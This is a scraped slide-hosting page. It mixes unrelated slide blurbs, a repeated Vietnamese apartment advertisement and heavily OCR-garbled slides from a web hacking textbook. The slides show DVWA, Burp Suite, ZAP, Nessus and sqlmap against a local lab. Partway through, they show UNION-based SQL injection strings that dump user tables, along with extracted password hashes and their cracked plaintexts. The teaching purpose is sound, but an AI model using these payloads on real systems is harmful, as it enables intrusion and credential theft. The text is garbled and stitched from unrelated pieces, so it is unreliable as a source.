The document discusses tools and techniques for attacking websites. It covers topics like information gathering, vulnerability scanning, exploitation, and web application attacks. The goal is to educate readers about common hacking methods so they can better defend their systems.
Biological control systems - System Concepts-Mathankumar.S, VMKVECMathankumar S
Biological control systems - System Concepts- Basic structure of control system - Types of systems - Open loop systems, closed loop systems, Effects of feedback, Block diagram & Signal flow graph, conversion of block diagram to signal flow graph, reduction of block diagram and signal flow graph.
Vista Verde Most Premium Tower – Orchid Tower
The Most Premium Tower at Vista Verde
New Release Saigon River View Apartments
For the First Time, Vietnam Open to Foreigner to Own Property
DON’T MISS THE OPPORTUNITY !
1 Bed from S$150 K, 2 Beds from S$210 K
New Released Limited Saigon River View apartments!
By renowned Developer – CapitaLand
Designed by Ong & Ong Architect
Mixed Development of Residential & Shopping Mall managed by CapitaLand
Strategically Located at the Heart of District 2, Ho Chi Minh City.
Surrounded by Government Administrative Offices, International Schools, Hospitals…etc
Winner of “Best Condominium in Vietnam” by Asia Pacific Property Awards 2015
Winner of “Best Landscaping Architectural Design Award” by Vietnam Property Awards 2015
Checkout the pricing NOW!
http://www.mysgprop.com/vista-verde-vietnam-capitaland/
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVECMathankumar S
Biological control systems - Time Response Analysis - Step and Impulse responses of first order and second order systems, Determination of time domain specifications of first and second order systems from its output responses.
The French Revolution, which began in 1789, was a period of radical social and political upheaval in France. It marked the decline of absolute monarchies, the rise of secular and democratic republics, and the eventual rise of Napoleon Bonaparte. This revolutionary period is crucial in understanding the transition from feudalism to modernity in Europe.
For more information, visit-www.vavaclasses.com
Biological control systems - System Concepts-Mathankumar.S, VMKVECMathankumar S
Biological control systems - System Concepts- Basic structure of control system - Types of systems - Open loop systems, closed loop systems, Effects of feedback, Block diagram & Signal flow graph, conversion of block diagram to signal flow graph, reduction of block diagram and signal flow graph.
Vista Verde Most Premium Tower – Orchid Tower
The Most Premium Tower at Vista Verde
New Release Saigon River View Apartments
For the First Time, Vietnam Open to Foreigner to Own Property
DON’T MISS THE OPPORTUNITY !
1 Bed from S$150 K, 2 Beds from S$210 K
New Released Limited Saigon River View apartments!
By renowned Developer – CapitaLand
Designed by Ong & Ong Architect
Mixed Development of Residential & Shopping Mall managed by CapitaLand
Strategically Located at the Heart of District 2, Ho Chi Minh City.
Surrounded by Government Administrative Offices, International Schools, Hospitals…etc
Winner of “Best Condominium in Vietnam” by Asia Pacific Property Awards 2015
Winner of “Best Landscaping Architectural Design Award” by Vietnam Property Awards 2015
Checkout the pricing NOW!
http://www.mysgprop.com/vista-verde-vietnam-capitaland/
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVECMathankumar S
Biological control systems - Time Response Analysis - Step and Impulse responses of first order and second order systems, Determination of time domain specifications of first and second order systems from its output responses.
The French Revolution, which began in 1789, was a period of radical social and political upheaval in France. It marked the decline of absolute monarchies, the rise of secular and democratic republics, and the eventual rise of Napoleon Bonaparte. This revolutionary period is crucial in understanding the transition from feudalism to modernity in Europe.
For more information, visit-www.vavaclasses.com
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdfTechSoup
In this webinar you will learn how your organization can access TechSoup's wide variety of product discount and donation programs. From hardware to software, we'll give you a tour of the tools available to help your nonprofit with productivity, collaboration, financial management, donor tracking, security, and more.
A Strategic Approach: GenAI in EducationPeter Windle
Artificial Intelligence (AI) technologies such as Generative AI, Image Generators and Large Language Models have had a dramatic impact on teaching, learning and assessment over the past 18 months. The most immediate threat AI posed was to Academic Integrity with Higher Education Institutes (HEIs) focusing their efforts on combating the use of GenAI in assessment. Guidelines were developed for staff and students, policies put in place too. Innovative educators have forged paths in the use of Generative AI for teaching, learning and assessments leading to pockets of transformation springing up across HEIs, often with little or no top-down guidance, support or direction.
This Gasta posits a strategic approach to integrating AI into HEIs to prepare staff, students and the curriculum for an evolving world and workplace. We will highlight the advantages of working with these technologies beyond the realm of teaching, learning and assessment by considering prompt engineering skills, industry impact, curriculum changes, and the need for staff upskilling. In contrast, not engaging strategically with Generative AI poses risks, including falling behind peers, missed opportunities and failing to ensure our graduates remain employable. The rapid evolution of AI technologies necessitates a proactive and strategic approach if we are to remain relevant.
Honest Reviews of Tim Han LMA Course Program.pptxtimhan337
Personal development courses are widely available today, with each one promising life-changing outcomes. Tim Han’s Life Mastery Achievers (LMA) Course has drawn a lot of interest. In addition to offering my frank assessment of Success Insider’s LMA Course, this piece examines the course’s effects via a variety of Tim Han LMA course reviews and Success Insider comments.
Model Attribute Check Company Auto PropertyCeline George
In Odoo, the multi-company feature allows you to manage multiple companies within a single Odoo database instance. Each company can have its own configurations while still sharing common resources such as products, customers, and suppliers.
Unit 8 - Information and Communication Technology (Paper I).pdfThiyagu K
This slides describes the basic concepts of ICT, basics of Email, Emerging Technology and Digital Initiatives in Education. This presentations aligns with the UGC Paper I syllabus.
2024.06.01 Introducing a competency framework for languag learning materials ...Sandy Millin
http://sandymillin.wordpress.com/iateflwebinar2024
Published classroom materials form the basis of syllabuses, drive teacher professional development, and have a potentially huge influence on learners, teachers and education systems. All teachers also create their own materials, whether a few sentences on a blackboard, a highly-structured fully-realised online course, or anything in between. Despite this, the knowledge and skills needed to create effective language learning materials are rarely part of teacher training, and are mostly learnt by trial and error.
Knowledge and skills frameworks, generally called competency frameworks, for ELT teachers, trainers and managers have existed for a few years now. However, until I created one for my MA dissertation, there wasn’t one drawing together what we need to know and do to be able to effectively produce language learning materials.
This webinar will introduce you to my framework, highlighting the key competencies I identified from my research. It will also show how anybody involved in language teaching (any language, not just English!), teacher training, managing schools or developing language learning materials can benefit from using the framework.
Introduction to AI for Nonprofits with Tapp NetworkTechSoup
Dive into the world of AI! Experts Jon Hill and Tareq Monaur will guide you through AI's role in enhancing nonprofit websites and basic marketing strategies, making it easy to understand and apply.
1. :
0
0
UJ *
0
z
>i/)
A /
THE BASICSOF
WEB HACKING
ToolsandTechniques toAttack the Web
I I, lil ,i
II Ell
! a II. ii i i
Josh Paul
1W
2. AMSTERDAM * BOSTON * HEIDELBERG * LONDON
NEWYORK * OXFORD
-PARIS * SAN DIEGO
SAN EKANaSGO ‘SINGAPORE* SYDNEY •TOKYO
ELSEVIER Synuress is ,m Imprint pf Elsevier
3.
4.
5.
6.
7.
8. R[i Working together
to grow libraries in
asEV[FJt
developing countries
www.elsevier.com •www,bookaid.org
33. 'Unsaved Document l X
if/bin/fcash
echo -e
w-hrt -g «* jrn Vul narahl H0h Ann Tnsraller s.i'i'lnt M"in
: * Save As.,,eefi
ech
DWVAjnstall.stÿecfic
ecfic
td t
ichc
Name:
Save in folder: jurnot v
+ Browse for other foldersecfic
rn i
ecfic Character Encoding: Current Locate fUTF-8) T Line Ending: | Unis/Linux V
ecfic
cd /
ecfic
Cancel Save
Applications Places System I'. 1
* Damn Vulnerable Web App (DVWAJ - Login - Mozilla Fircfox
File £dtc view History Bookmarks Tools Help
Damn vul neraWe Web App (DV ..
f§) BE http://i?7.o.aIflogm.php
HBackTtiacfc Unus Security ||Expfcut-DB V4|rcra(:l<'r'(J I]SEORG.c
DV/WAy
Username
admin
PjlUfrOM
ll
34. M
Login
if the database already exists. it wiil&e cleared and the data win t* reset
Backend Database: MySQL
Create i Reset Database |
Database has been created.
Users' table was created.
Data Inserted Into 'users' table.
’guestbook;' table was created
Data Inserted Into 'guestbook' table.
setup successful!
35. DWVA Security 1
Script Security
SscunLy Level 1$ currently low
You can aet mu security tavul to low, medium or lnÿn
Ttve secufily levÿJ change* tins vuiiwafiinly lev<?i <H DYWfi,
10* _ * $L*fnit
36.
37.
38.
39.
40. [>.1JKOE.I SUSfl University
O, 13E.247.6-4.140/
FUTURE ETUDEMTS V CUSRENTETUDEfÿTS V FAOJLTYÿTAFF V PARENTSÿ?AMI L1
DAKOTA STATE
TTCMSMOUir.WE'RESETUR,
49. NeSSUS vuLnera bilfty scanner rs»i Htti Stwan 5*jn CM
1
SrS*.R4*utf RDiWi Ui*f* COftiÿfSton
& Listing Scans + & Opbt« v
E Scaji Tltki Created By Start Time v Status
Mardi 23. 201313:03-11tocalhwt erncR I'M*
63. HXl I
t HartTtitV
•intwnrt
M CHTlffi
I Cc, Inform Ukin Oothwmg
- 'll WnWWtfli*J *M«VnW
- 0 EtÿOlJ'iwTiMlS
j! P?L* cÿe E-stafaiion
- if r1.: r'.til -rr-j- A' [ t’J’,
IjT ftcyvst Engineering
- FIFID-R»JS
o SIIIH ttv.iNj
rfi MUOtf*i!itySc-irih#j>
x NeLwirt Amsimort
WsbAwucaltori teraiment L
iti CWSV nenl lily JoHUIuelon
l*W> AocfkOtJonfitrrerj
R£ AFpiirnliOnS335
Wit Open Source AsiKsmtrt
S**ggy/sOVUneraHlltyita
m '
W .Sw*!(ÿ Wfco t; hrrpwHf1
't t*<TS(l“iajl
i
' Firefox Preferences
k •• a & oGeneral Tabs Content Applications Privacy Security Sync Advanced
General Network update Encryption
Connection
Configure how firefox connects to the internet Settings...
66. * bmp Mjili fur cd-HI-sn Ml.4
Wp -TiVMi IÿHIKBT m+&m iOM
i&lfm (*•••- I P4»V*W
«*«ÿ#( IJHMM !_
F hdrÿ n*4 Ieu4 A«TTB. !K3H>;111
**•
ti-z-J. eJc
W*>#
ncWiphp
#nAnjcl>HTk pÿp
•*ÿ a} »»*v<F-e**
j'HJfJiP'JtrM-m
1
Wl «rv4ar .k,-4a#, -a-Ji-
liTj*] m '
-ipfÿa* '
' rtfinh"
-» m__!
I IMvi- feuSd F!i-r !V C St. r +pr
- M!p >nJT.D.BLS
Jirr.4Lfi.ij
.+.«(.»*is
i itu FW
L
rs-_i
;
67.
68. v x burp suite free edition vl.4A
burp intruder repeater window about
target t prow I spider T f intruder [ repeater [ÿsequencer 1 decoder | comparer I
control ! options |
settings
[aiacheck robots,<xt
@ detect custom ’not found' responses
* ignore links to non-ted content
0 request the root gf ell directories
0 make a non-parameterised request to each dynamic page
maximum link depth:
monitor burp proxy tratfk
E> passively spider as you browse
link depth to associate with proxy requests; 0
69. forms
7individuate forms by; action UHL method and fields
-don't subpurt forms
prompt for guidance
* siutomatteall/submit using the following rules to assign parameter values;
.field name hold value
fwienen@example.04nn
[Peter~
[wiener_
_
match
* egex mail
* regex first
regex last
* reqex surname
y regex
___comp
edit
A
remove
up
Peter Wienername
downtier Consulting
-CSltflLnjfti:
regex_ addr Main Street
UrfiAne-ruillA
.... i » add
£ set unmatched fields to; [555-5b5-Q199@exafnpte.com_
5 iterate all values of submit fields -max submissions per term; 10
70.
71.
72.
73. *V
fiiCtlhKll
4 Grjphici
# IIH«H«
m offlif
- ( lnHormatror.ÿHI-tnrr;
VVJnenfeHlty
- 0 [.ÿpti>rj[n5i,iT«U
- Mvitfge EKHtiDt*
. If K' l n(i) i r/j AtttM
v Reverse Enflinwi
‘ J( RFlDIWi.
.1. WmeraBI ry li.smffi
iAfciJÿpHewion Aiietamrt
CWflbow A«evjmen«
gj MSVU it'ilily !ÿ!.-: 'I!'ÿ.-! ;:ÿÿ
' & W '
on :
'46' W?D ApUlcaUnif Prnsirs
;j£ tuft:ÿ Dpei.Sou .e hie •, me( r
We*Mintrabitity Seamen
iil
I, Sounrtfi video
Q Syiimn T«H*
J Wine
*ÿ bnrpsune
wasp-zap
o ienwsTfcicifta
Fafcnicf
flepoirir -j 1Wv
(P
? Mlxdineeu
_
* OWASP ZAP
SSL Root f A certificate
ft SSL won't work if you haven't created and imported an
”
OWASP 2(iP CA root certificate. Vou can create such a
certificate any time in the options menu, so you do not
have to create it right now.
Gener... Go to options panel and create certificate now
Later Mot now. but create certificate later.
74. 3 -a bb E N “ O <3 jE or o >H- dDi H IN JC Q E
ii§i'ÿ!ÿSll||slf 13ala l£L|fl t>v|UlJN K|U
H > >xOÿ > V C> = ti « « -j P A +.J
"*ÿ>
3 C 3
*Ut*»2»gt5H$aiI»S
gtssiliesgs
. I t ¥ 4 ta|St sd sMSI?t sa: =SeSii3¥ililTfgi5SÿeS!
: t iffI15S3 21£ 88£S i 3V :
5ÿ£S2ÿ|iib#ga!giitea3gÿE
0 £
* -5 f 7 > r S5 c 3H t V y
K M LLI UJ -li Z V T L>J<|JlO!t'|-lAM
yj M " J u 3 'v i v x LU z « u i ii- _i ui LL
Sfeasi fegsisass sssÿ&c
=§£Eÿf = 8-*. I-* £ JO Z £ £ JC rÿi U ¥t r-r *
—1 ~3- C »- tj tj i-
isli=3llj«*Sasls«-igi81
i? N H S 9 ffl Ci k- TQ Offl 4 &riX-nÿ *
Cl X r4 O' n Q Li Z 5 n U- T CL OJ. '--. OJ U K <V 3E JQ «
H(ÿZIi.llJ££Q<v04|Ufl4l5actÿH
1 | N V V >- +' T. F* J 50 S'ff >ZE * »
ZX£fZxr-oaHCUJC4,£N440ti-s.|| rr CPÿ
*
ffl
IUl
3
£ ::ÿ
i :'-
i:
:
1
<j?£
T
S ri C
l-ÿi
<ru
3 3
_
5z
L
I/
d. :_•
“V
JT g £ Ss “ I s S . u
»i iSiliu
0%tK
? g
i |f|,S
f 5 14-1# s
! B s ts
Li
C
o H -L
£ J
* f
75. IH Applications Places System Q
- - * Untitled Session - OWASP ZAP
Eile Edit View Analyse Report Tools Help
L j ki W i"l 3 3 *“ l> 0
JSitesc*- Request
Raw View
Attack_ GETiinc
GETJOC
. P0£T:k
|j_J dVwa
Igfr vulnera
" J_I http;// : at-
http://saf<
Active Scan sit*
Active Scan node
Spider site
Brute Force site
Port scan host
r.
Exclude from
Ron application
Delete (from view)
Purge (from DB)
Resends.
VSew In Browser
Break..,
c
t
y
1
1
*1
Cookie: PHI
DNT: 1
Content-lei
[ History ™ [ Searth |BreaX Feints X|tins f*1 Scan ?) ]Spider |Brute Furte/|Pert Start ' |Fufflfrf |Output|
Current Xsnj;!Site: l*7,0,0,1
UPl found during cravnl:
httf U127 P P ]/itoT*r]t/rc-5:Q-D
uni found but out of trawl scope:
--ÿ
r-r rr«rr.nr.™f™ ~ -•Vt • *V-irV» 11
-..
owaip orqulndex php,fifap_10_3Q<l,7-AJ
f History 1Search |Break Points X~| Aiortÿ f*T[ Active Stÿn |Spldorÿfj j~Port Scan ' "[ FmardTTOutput|
Site: 1J7.U. U. 1 T L J Current Scans:l
$Et httpM17.OSKMffil,l$e4175}17mMf 1.p*ip
SET Frttp:J/l 27,0,0.1l&*«m2G2375060775356264.php
GEf ktpiW127,0,0,1/dWHftiii-S-10706641574067586
GET littp:,'/127.0.0.17dvA a.' mag-?s/ea*63413iJ$9217163S
SET l-rttpz/yi27.0,0,1ftlvwaAncludeV3125536246617472704.php
SET http;tVl27,O,0,l,rdÿ'Vrfl/liitli.id“G.'DEMS77207'jl00S7 3PE3O9340. php
404 Not Pound
404 Not Found
404 Not Found
404 Not Found
404 Not Found
404 Not Found
Sms
2mG
4mi
Sms
3ms
tms
76. (SET hnp:JBa7.Q>0LÿJIdw«J]iAÿ?aa?*5W5t>3ÿ753 4Q4 Not Foynd 4m*;
Current Seans "
1 vjrQ
V:(T..h |
Pyir.f,. _ j 4|.V|V, j 4.'; i ...S; Sj" ll-r j Brut': F 0 . , t'vH 'j'.i'i ,F i .
T tier..
* at SOL ln|eitiort Fingerprint Irtg 14)
_ hutpij/l27,0.0.17dvwa/intludes/DBMS/?C-S;0-D'IHjE(
ISQl Injeetlon i mo-H-f pcinl in<7
Risk: 1*High
Reliability: Suspkiouo
Rarameter: username-admlnt password passwardit,oijin-l,oijlnfli27IfyjECTJ
DtKKFttofl
B ht(p:(yl27 0.0. lfl agin pnp
htr p:yyl J7.di.di.1ftetup.php
Jut p-lll 27.0.0.1wlnerabiliNes/fiidpage
-include.php
illI*SQL lfi|e(tion (4 )
•t ij - Directory Drowsing (7)
aJ -Cookie set wthoot HttpOnJy fta-g <«)
.i*i . Password Auteeomplel* in brwrter <?1)
SQL injection may be possible.
othrf inf*
77. * Save
j j at i IJ&J i a j rÿn i j»i tLook Ini _i iool
Lÿj Desktop
ZAp.htmlFile Name;
3Files OfType; ASCII KTML Me
£antetSave
78. | History j Search , Break F'ointo |4Jerts | Achve Scan "•
| Spider [ Brute Force
_-|Fort Scan : I Fuser
j direttory-tet-Z3smai.txt j*) flfl USitfrj127,0.0.1 0%
Kivvp..ii .w»v*11 uVI 1 .ri_iÿ(uJ-| ifj'iijj.!u.v;i.,'.JlJ|Uii i JI J.pi .j_‘ li IW i i iMiJVV
hit pmJ7.Q.Q.L:ao/external/phplds/0,e/t*startoverage/
httpm27.0.o.ltaMcori5/
htt pm27. O.O.LiBQ/index/
hittp-:/7Li'7. 0.0,l:8Q/irr:t ructions/
ht[ p:Hi27.0.0. L:BO/login/
httpm.27. 0-0.1:e0/loqpuitr
hfttps//l27.0,0.1rSQ/set urity/
httpm27. 0.0. L:80/5etup/
httpm2" 0. 0. L:80rvutnereblitie;
htt p:m27.0.0. L:BOMilnerebrlitie *b ruter
htt pm27. 0-0.1:8QAfljlneret..l-t14c/ctrt.'
http:ffl27. 0.0. L:SQtojInerabiht1e5/e*ec/
httpm27, 0.0,1:80/Vulnereb:lities.fir
htt piff],27.0.0. Li80/vulnerebilitles/iqli/
httpc//l27.0-0,1;80Milnerabililtlesftÿ|)lln<lt
htt pm27. o_o, L:OOtailnerebilrt1* -voplorid r
htt pm27. 0.0. L;80A/uinereb;hties/viewhelp.pbp
htt pm27. 0.0. L;80/vulnerabilitle sMeÿsource.php
htt pm2 7. 0.0. L:SOMjIn erebditle c.rvi ew_sour<eÿall php
httpM27.0,0d;:SOMiJtrwrabflltlestes jt
htt p:/ÿ27.0.0.1;80/YiJlneratgtj#5/i<ss_5y
200 OK
200 OK
302 Found
302 Found
200 Ok
302 Found
302 Found
200 Ok
200 Ok
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
302 Found
Current
79. Active scanning wnard
Actively sc jpi nm tuple items
Vou have selected 71 items for active scanning Before commuing you can use (He titleJSSslow to
remove certam ateaones of Hems. let make yo ur scan mug more ta rgetted and efficlent
t. remove duplicate items isamÿ 'jRLand parameters) [2 nems|
. ] remove Hems already scanned (same URL attfjparamotars) [35 items)
LJ remove out-of-scope Hems [22 Hems)
? remove items AITII media responses [0* items)
Q remove items Aim the foitoAmjextensions [0 Items]
is gitjpg.pnp.e5s
Note Seme o< irto solected items do not yet hav* responsos it you tnoose to remove items mAh
mefl ia responses some of these Hems may be te rupee d from me scan when their responses ha*e
been analysed.
cancel next
80. I (?) burp suite professional vl2
burp intruder r-e-p =ati r window help
target piunr ' spider-!' scanner [ intruder '
repealei
tosiJte~f scan queue } Iwoscanrung | options ]
sequencer ! decoder ! comparer [ corruns '
alerts j1
issues requests errorspair .....3H& .
_
] L 'V cft-i'p
Jf**. complete
5% compete 2
T 5ÿ4 complete Jcomplete
complete B
jia% tompi4te_ B
55%-:omp?tte 1
Tiniibe-d fl
Insertion points
is
'
I i*osl
________
J_ibibsJSwwr.mv... ftontacisfilSifDefaumspic
hrtcpp tfoww my fcgntiiclsf1OMlOpfiClN 8>px
13 [Mpts>hww.rnr-. ItMbdiflOUQeau&MjHC
htpt jrwwin mv I'crediicardsii.'Default asps
_jiniHaa'Pwwwmv... rompnnwasnfPafaiHtasjM
6 IllllpsJlftSfflMrJnT... 'femplOpeasrUDefault asp*
https JJWWW m> diiefschangeti ffEMsufl asp1
'ÿ
I'l i. Ill, ..-v <ÿ' 11 -tn I T-'O..-liu 1 iif
4 rltpi -'Miti nn inviss.'!.1
j10
__https m, rprefsnrDvfauil.aspt
11 blips ffwww my. . Iprels'l ' Defaull.SSpic
1: hEPS 'ÿ'i.j.-j. m, '50 jr( hr I lOÿOMt J cp
Mps:fftywwjmv... fsearchfl3JlefaullLas(w
httpjJl'r.v.'w my fsearc hf1
1341
129
114 IS
”6 7
i 1Jh 7
125 1C
131
128 If
ic: s
134 5
complete
_
WillUlJ_
1
13
14 waiting
81. lean 26' j 1 nmf |fmiiihtd j .my4patDrÿfkigi n/102/Defeurtnihx
wsues | basg (aflutist | 6as» response |_
O SQL injection
ashtsorj [ requestl [ resportsei j request? f response? |
ft SQL injection
Issue
Seventy High
Confidence Certain
Hast
Path
SQL injertion
https:fhnim.myapp.com
.‘lflgili'IOZ'TJeftiiJt.iiishi;
Issue detail
The username parameter appears to be vulnerable to SQL intention attacks A suigj; fixate was submitted lei the username
parameter, and a database error message was returned Two smÿe quote? weet then sybmnted and the error message
disappeared You should review the contents of the error message, and the application's handing of other input, to confirm
whether a vuinerabihty LS pr«en1
The database appears la be Microsoft SQL Server
82. (ÿ) burp mils- prdftiikinal vL2
burp intruder reefer window help
spiderÿ] scanner Intruder | repeater sequencer decoder f comparer comms alertstarget '
prosy
results live scanning j_op1ionsscan queue
? https ;'www iTryapp.com <ÿ
OSOL injection [4|
O KTTP header Injection
f O Cross-site scripting (reflected!) S')
O ''searchil fPeTaurt asp* lSearchTerm parameter)
OisearttiMMMauHaspxjSeafciiTami parameterÿ
? LDAP Injection
Open redirection
Password Geld with autocomplete enabled
X SSL tooktewrtlTOut secure flag set
X Cookie without HttpOnly flag set
>ÿ
x Cacheable HTTPS response ji 0]
X KTML does not spetrty charset |2]
i /
o- i admin
*- O toniacts
credrtcards
i derautt.html
*- ? employees
*- X fileenchange
news
o-
6-
«- O profs
v O search
:'t O 12
advisory request responsei'
O Default aspx
0 Cross-site scripting {reflected}
issue
Severity.
Confidence Certain
Host
Path
Cross-site ftcripting (ioileded|
High
https: wrtw.myapp.com
Sexdi 12itMaub.aspx
83.
84.
85.
86.
87. Welcome to Damn Vulnerable Web AppfHunt
Dmn Vulnerable App (OVWA1 * PHP.'My&QL we4> rrwi is linmn vuinMflHe lie main gwj*s
am to N an ,1 a tor joeun'y pmtwsiorKiti Is ;«i thf/ir $Ki s and loo1- in a legal orwrcnmonl. tayÿ web
devi*fl(Kiri MKIflf r«JCif.1aixJ Iny (iHJCessw Of Securing wots aÿlienLkitij. Stfid nirj |i»ebi>C!i.:slLxiiniK lo
icadvlc.nn vioh appiical o« security in a TilWIT room env.rcrunenl
Instructions
Setup
WARNING!Brato Force
Command Execution
m+
DJtrvn VJnwmvo W» App is damn vuirHHiWe! Donot upload it toyotf hosting provider's pgplie html Tokfef Of
any internet rating web server as it Mill be compromised Wo recommend or J.-, ilcvu IVJ and Instating
onto 3 local machine inside your LAN wfwrh Is used soloty for losing.
Disclaimer
CSRF
File Inclusion
SQL Injection
w* do not ts*o iiwpofisiW.iy fv tho wjy .n Mh«;h (my ono uses this epputtfitn we have mado the purpose* of
the appdcaiion clear and it should not ho used ma&ciou&ly. We Nave given ivaimngs and taken measures to
prevent users from install- ng QWVA on 1o tire A1*!smm |[ your wo* senior is compnom -s<!d v ia an installation
at OVWA it Is not our responseHty it is TJv? respccisIDHity of !ho personis wm uploaded and installed It
General Instructions
SQL Injection (Blind)
Upload I
IX5S M'tLl-J
XSS stored
The ndp puHon allon* you Ii> vie* rttsftips for each v ulnoratrlily and for each son jfly levin on thou lospective
P*3«tDVWJl Security
PHPlnlO
About
Logout
88.
89. Vulnerability: SQL injection
User ID;
| Sutunil
ID: Rellk' or 'a' »’a
First name: admin
Surname; admin
ID: Rellk1 or 'a" -'a
First name: Gordon
Surname: Brown
ID; Rellk' or "a" ='a
First name: ttack
Surname; He
ID: Rellk- or
First name: Pablo
Surname: Picasso
‘a- -a
ID: Rellk' or ‘o' «'a
First name: Bob
Surname: Smith
90. v x burp suite free edition v1.4.01A
burp intruder repeater window about
target Intruderscannerproxy spider repeater sequencer
11 intercept options | history 1
request to http;//l 27.0,0.1:80
forward drop intercept is on action
raw j params j headers ' hex
GET request to /vulnerabilities/sqli/
valuetype name
Rellk%27+or+%27a%2?%3D%27aURL id
Submit SubmitURL
PHPSESSID iTi7cOuorvt8mBsgdd[bv5o|4ue2cookie
cookie lowsecurity
91.
92. User ID:
| Suborn j
ID: Rellk* DT l-l union select null, database!) 4
First name: admin
Surname: admin
ID: Rellk' or 1=1 union select null, database!) a
First name: Gordon
Surname: Hr own
ID: Rellk* or 1=1 union select null, database!) #
First name; Hack
Surname: Me
ID: Rellk* of 1-1 union select null, database!) H
First name: Pablo
Surname: Picasso
ID: Rellk* or 1=1 union select null, database!) *
First name: Bob
Surname: Smith
&ID: Rellk* or
First name;
Surname: dvwa
on select null, database!) #
ID: Rellk* and l-l union select null, table name from information schema -tables
First name:
Surname: guestbook
C?
*
ID: Rellk1 and
First name:
Surname: users
n select null, table name from information schema . tables
ID: Rellk* and 1=1 union select null, table name from information schema .tables
First name:
Surname: columns priu
ID: Rellk' and 1=1 union select null, tahle name from information schema , tables
First name:
Surname: db
#
M
ID: Rellk* and 1=1 union select null, table name from information schema. tables
First name;
Surname: event
#
93. UseT ID:
Submit
TO: Rell*' and
First name:
Surname: users
user td
1=1 union select null, concat (table name , 0x0a.column name l
TO: Ret Ik J
and
First name:
Surname: users
first name
1-1 union select null, coneat f table name, 0x0a,column name)
ID: Rellk' and
First name:
surname: users
last name
1-1 union select null, concat ( table nane, GxDa, column name)
10: KellkÿAd
r : I :
user
l-l union select null, concati table name fextta, column name I
10: Rellk' arÿÿi-1 union select null, concatltable name, Gx8a, column name)
Surname
passwoi
ID: Rellk' and 1-1 union select null, concat (table nam0rGxflap column name I
First name:
Surname: users
avatar
94. User ID:
|_5ubmlt
ID: Rel lk ' ami 1-1 union select
First name:
Surname: admin t
bf4dcc3bbaa7G5d&ld03?7debGB7cf99
jftcaU user.exBa. password) from users st
ID: ftellk' and 1-1 union select null, concatl user.GxGa. password) from users 2
First name:
Surname: gordonb
Cr993lBC423cb3Bdbf2f.08b3t.7&9;72ee3
ID: Rellk' and 1-1 union select null, coocaf loser, G-xOa, password) from users 2
First name:
Surname?: 1337
3d3533d75ae2c3966d7eed4fcc69316b
ID: Rellk' end 1-1 union select null, concat (user ,e-s5a, password) from users 2
First name:
Surname: pablo
()d1a7d B9f b bbe4&t ade3de5cJ1e9e9b7
ID: Rellk* <ind 1-1 union select null, cculCStluSer , 9x03, password) from- users M
First name;
Surname: smithy
bf 4dcc3bbaa76bd6ld3327[]|[?&BB2ef99
95. A v v ‘unsaved Document l -gedit
file Edit View Search Tools Documents Help
Save W UndoOpen T *
‘Unsaved Document 1 X
adnvi n:5f4dtc3b5aa765d6ld3327debfl02c f 99
go rdonbte99a lBt42B£b38d5U6OB5367B92:je03
1337:8d3533d75ae2c3966d7e6d4f cc69216b
pablo:ad18?d G9f5hbe46tade3de5171e9e9b7
smi thy:5f4dcC3b5aa765d6Ld8327deb362t f 99j
Plain Text T Tab Width: ST In 5, Col 40 INS
96.
97. v x burp suite free edition vl.4.01
burp intruder repeater window .about
target j proxy j' spider [' s
| intercept
1'intruder |f repeater f sequencer decoder 1 comparer ]' optiorcanne
options
1
history
request to http:tfl2".0.0.1:80
forward drop intercept is on action
if parents [ header? | hexraw
GET vulne Lain ilit ies/3C|li/?id=l (Submit*Slavic HTTP i.l
8ost: 127.d,0.1
tisec-Ayent: frillla/5.0 tXllf LlmUf ±£QCt tv:ia.Q.2' Geefco/QOIOGIOI Ficetax/10.0.2
Accept ; text /html , AIP-I)1 icat im/xhtbl-Kadl, app1icat ion 'Knilrrc[_0. &. */ *;<[_0 ,e
Accept-Langtiaÿe: en-113. en; q=0. 5
Accept-Encoding: deflate
Fcoxy-oonntccion: lceep-|ilive
P-eCfter ; http:f l137 ,a.D. 1/vwlnetabi A ities/flcjii/7iti“2
Cookie: PHPSESSlDMDc IrkSvqi-lsBkkqacueoSSf I:L7; security*!-,.
1
FIS;48:35] (INFQl the back-end DBMS IS MySQL
[18:48:35] flMFO] fetching banner
web server operating system: Linux ubuntu 18.64 {Lucid Lynx)
web application technology; PUP 5.3,2. Apache 2,2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0
banner; '5.1,41- 3ubuntul2 , lGt"
98. E18:48:35] f INFO]: fetching cur 'ent database
current database; 'dvwa'
.1] ft] IN] [i ft r "
"ql
r tTtT1]
[19:02:20] f TNFO ] fetching columns for table users' on database 'dvwa'
Database; dvwa
Table: users
[6 columns]
+
| Column I Type
back
*ÿ
+
va rctiar(76)
varcharUS]
varetiar(15)
varctiar(32)
varcbar(15}
int (6}
avatar
first name
last name
password
user
userid
+
99. [19:65:58) [INFO) postprocessing table dump
Database: dvwa
Table: users
[5 entries]
| password | user user id
5f4dce3b5aa765d6lde327deb832tf99 (password) | admin
e99a1Bc42Beb38d5f269853678922e93 ( abC123)
Bd3533d75ae2c3966d7eed4fcc692i6b (Charley)
edl07de9f5bbe4Gcade3de5c71e9e9b7 (letmein)
5f4dcc3b5aa765d61d8327deb8S3&f« (pÿWd)
L
I gordonb | 2
I 1337 1 3
r1
100.
101. Vulnerability: Command Execution
Ping for FREE
Enter an IP address below
I’lHG 127.0.0.1 <t!!?.0.(). 1> 1 0J J bytes of data.
64 bytes from 127,0,0,1: ur.p seq-1 ltl-64 tLireÿ0.050 ms
64 bytes from 127.0,0.1; nip spq =3 ttl-64 nme=r{i.96fi ns
64 bytes from 177.9.6.1: itmp seq-li 11 1.
-Ci 4 t J irve-B.95? s.
127.0,0.1 ping statistics ---
3 packets transmitted. 3 received, packet Loss, time JS&lms
rtt min/avg/fliax/mdev - e.Obzyo. 060/0.066/9.me ms
102. Ping for FREE
Enler an IP address Wow
Sut-.mil
PING 127.(3.5.1 (127.13.0, l> 5&<84) bytes of data.
bytes from! 127.6.6.1: icmp soq-1 ttl-Q4 time-6.642 ms
64 bytes freir 127.6,0.1: icirp seq,-2 tt-6-l tifne-B.G44 ms
64 bytes from 127.0.0.1: icmp teq-3 ttl-64 timc-B.B32 ms
**-
127.0.6.1 piny statistics
3 packets transmitted, 3 received. Bit packet loss, iifliu l99Bms
